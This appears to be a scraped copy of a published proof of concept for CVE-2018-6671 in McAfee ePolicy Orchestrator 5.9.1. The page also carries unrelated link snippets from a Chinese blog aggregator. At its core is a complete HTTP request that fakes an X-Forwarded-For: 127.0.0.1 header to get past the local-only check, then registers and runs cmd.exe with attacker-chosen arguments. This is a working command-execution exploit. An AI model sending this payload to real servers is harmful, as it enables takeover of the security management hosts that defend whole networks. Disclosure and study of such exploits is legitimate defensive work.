# Exploit Title: McAfee ePO 5.9.1 Registered Executable Local Access Bypass

# Date: 2019-03-07

# Exploit Author: @leonjza

# Vendor Homepage: https://www.mcafee.com/

# Software Link: https://www.mcafee.com/enterprise/en-us/products/epolicy-orchestrator.html

# Version: ePO v5.9.1

# Tested on: Windows Server 2012

# CVE : cve-2018-6671

GIST LINK: https://gist.github.com/leonjza/17eb8ed9cba0ea1d2c70b82782c6d949

# CVE-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass

# Specifying an X-Forwarded-For header bypasses the local only check

# https://kc.mcafee.com/corporate/index?page=content&id=SB10240

# https://nvd.nist.gov/vuln/detail/CVE-2018-6671

#

# 2019 @leonjza

#

# Tested on ePO v5.9.1, missing hotfix EPO5xHF1229850

POST /Notifications/testRegExe.do HTTP/1.1

Host: 192.168.1.26:8443

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0)

Gecko/20100101 Firefox/66.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://192.168.1.26:8443/Notifications/addRegExecutable.do?orion.user.security.token=Bp5pZJOQll2vryhC

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Content-Length: 284

DNT: 1

Connection: close

Cookie: JSESSIONID=645BCB1CE5B7DBE1B9EDC7BB9F2F7349.route1;

orion.login.language="language:en&country:";

orion.content.size="width:1384&height:699";

JSESSIONIDSSO=4D970A5F2DBF48309F796DF38B80FC15

X-Forwarded-For: 127.0.0.1

orion.user.security.token=Bp5pZJOQll2vryhC&orion.user.security.token=Bp5pZJOQll2vryhC&executableName=CVE-2018-6671%20PoC&executablePath=c:\windows\system32\cmd.exe&userName=&pass=&passConfirm=&testExeArgs=/c

whoami > c:\CVE-2018-6671.txt&testExeTime=60000&objectId=0&ajaxMode=standard

--

L.

:wq!

[EXP]McAfee ePO 5.9.1 - Registered Executable Local Access Bypass的更多相关文章

  1. [EXP]Joomla! Component Easy Shop 1.2.3 - Local File Inclusion

    # Exploit Title: Joomla! Component Easy Shop - Local File Inclusion # Dork: N/A # Date: -- # Exploit ...

  2. metasploit-post模块信息

    Name                                             Disclosure Date  Rank    Description ----           ...

  3. Spark安装过程

    Precondition:jdk.Scala安装,/etc/profile文件部分内容如下: JAVA_HOME=/home/Spark/husor/jdk CLASSPATH=.:$JAVA_HOM ...

  4. mod_cluster启用https协议的步骤

    1.生成SSL证书与私钥 Generate Private Key on the Server Running Apache + mod_ssl First, generate a private k ...

  5. PostgreSQL导出一张表到MySQL

    1. 查看PostgreSQL表结构,数据量,是否有特殊字段值 region_il=# select count(*) from result_basic; count --------- ( row ...

  6. Ubuntu12.04 Bugzilla 和 TestOpia的安装步骤

    1.        安装apache User@ubuntu:$  sudo apt-get install apache2 注:安装完以后能够通过http://192.168.128.128/ 来訪 ...

  7. window7配置python3.3 + django + apache24 + mod_wsgi

    window7安装配置python3.3 + django + apache24 + mod_wsgi 1.下载版本的时候要对应 2.apache24 别放系统盘, 不然权限很麻烦 3.django ...

  8. DYNAMIC LINK LIBRARY - DLL

    https://www.tenouk.com/ModuleBB.html MODULE BB DYNAMIC LINK LIBRARY - DLL Part 1: STORY What do we h ...

  9. Apache 与 php的环境搭建

    Apache和PHP的版本分别为: httpd-2.4.9-win64-VC11.zip php-5.6.9-Win32-VC11-x64.zip 下载地址: php-5.6.9-Win32-VC11 ...

随机推荐

  1. DJango 基础 (5)

    模板加载静态文件 在settings.py文件中添加STATICFILES_DIRS,设置静态文件目录路径,同templates. # settings.py文件中​STATIC_URL = '/st ...

  2. Python项目--Scrapy框架(二)

    本文主要是利用scrapy框架爬取果壳问答中热门问答, 精彩问答的相关信息 环境 win8, python3.7, pycharm 正文 1. 创建scrapy项目文件 在cmd命令行中任意目录下执行 ...

  3. uboot——git代码仓

    1,注册GitHub帐号,创建GitHub项目代码仓库 https://www.cnblogs.com/LoTGu/p/6075994.html 参考其第二段,注册账号,设置仓库. 2,上传代码 测试 ...

  4. Python开发——数据类型【元祖】

    元祖的定义 tu = (11,22,33,44,) print(tu) # (11, 22, 33, 44) tu = tuple((11,22,33,44,)) print(tu) # (11, 2 ...

  5. Web常见安全漏洞-SQL注入

    SQL注入攻击(SQL Injection),简称注入攻击,是Web开发中最常见的一种安全漏洞. 可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作, 甚至有可 ...

  6. idea环境配置

    Idea 下载 https://www.jetbrains.com/idea/download/#section=windows idea安装(略) idea破解 window配置hosts文件:0. ...

  7. Android SDK Manager 无法打开

    环境变量已经设置(安装JDK8后 其实无需设置,之前记得Win7有个巧妙的地方是创建了3个快捷方式到某文件夹,现在Win10上直接将java.exe等放到System32目录下). 但是依然不行,网上 ...

  8. nginx图解

    1.Http代理,反向代理:作为web服务器最常用的功能之一,尤其是反向代理. 这里我给来2张图,对正向代理与反响代理做个诠释,具体细节,大家可以翻阅下资料. Nginx在做反向代理时,提供性能稳定, ...

  9. ABP框架系列之四十六:(Setting-Management-设置管理)

    Introduction Every application need to store some settings and use these settings in somewhere in th ...

  10. Java并发编程73道面试题及答案

    原文出处:https://blog.csdn.net/qq_34039315/article/details/7854931 1.在java中守护线程和本地线程区别? java中的线程分为两种:守护线 ...